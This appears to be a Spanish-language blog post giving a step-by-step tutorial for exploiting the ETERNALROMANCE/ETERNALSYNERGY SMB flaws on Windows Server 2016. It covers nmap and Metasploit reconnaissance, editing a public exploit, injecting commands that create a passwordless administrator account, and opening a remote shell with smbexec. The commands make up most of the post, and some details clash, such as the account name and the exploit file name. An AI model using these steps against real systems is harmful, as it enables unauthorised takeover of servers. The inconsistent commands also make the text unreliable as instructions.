Explotando ETERNALROMANCE ETERNALSINERGY en Windows Server 2016

El exploit se encuentra en la popular base de datos de exploits: exploit-db. Es necesario
agregar una cuenta valida de cualquier nivel de permisos y el nombre de un PIPE.

1. Abrir firefox en la siguiente liga:
https://gist.github.com/hkm/

2. Click en el script “eternal-2016-install.sh” y descargarlo dando click en el boton [Raw] y seleccionen “Save Link As…” y luego el boton [Save].

3. Ejecuten el script con el siguiente comando:
root@kali:~# cd Downloads
root@kali:~/Downloads# sh eternal-2016-install.sh

4. Correr el script de nmap para obtener información remota del Windows 2016:
root@kali:~/Downloads# nmap -p445 -sC AQUÍELRANGO

5. En los resultados podemos VER que tiene la cuenta ‘guest’ habilitada:
account_used: guest
(apunten la IP que la utilizaremos en un momento)

5. Editamos el exploit para agregar el nombre de usuario ‘guest’:
root@kali:~/Downloads# nano 42315.py
Bajamos con las flechas hasta la parte de: Username = ”
Agregamos lo siguiente: Username = ‘guest’
Salimos del programa con CTRL+C y luego la tecla [y] para guardar.

6. Tenemos que buscar una named pipe de la máquina víctima con Metasploit:
root@kali:~/# msfconsole
msf 》 search pipe_auditor
msf 》 use auxiliary/scanner/smb/pipe_auditor
msf 》 set RHOSTS AQUÍLADIRECCIÓNIP
msf auxiliary(pipe_auditor) 》 run

7. Corremos el exploit de la siguiente manera:
python eternal-2016.py AQUÍLADIRECCIÓNIP AQUÍELPIPESIN/
(Esperamos que el exploit termine en “Done” si no lo hace,
probamos con otro nombre de Pipe)

8. Ahora que sabemos que funciona el exploit vamos a elevar privilegios de la cuenta guest a Administrador. Para eso
Cambiar la línea que inicia con ‘#service_exec…’ por las siguientes dos líneas:
service_exec(conn, r’cmd /c net user nuevoadmin /ADD /PASSWORDREQ:NO’)
service_exec(conn, r’cmd /c net localgroup administrators nuevoadmin /ADD’)

9. Utilizando smbexec.py podemos abrir una shell con la nueva cuenta:
root@kali:~# cd /usr/share/doc/python-impacket/examples
root@kali:/usr/share/doc/python-impacket/examples# python smbexec.py nuevacuenta@AQUÍLADIRECCIÓNIP

Share
Esta entrada fue publicada en Videos, Vulnerabilidades. Guarda el enlace permanente.

Los comentarios están cerrados.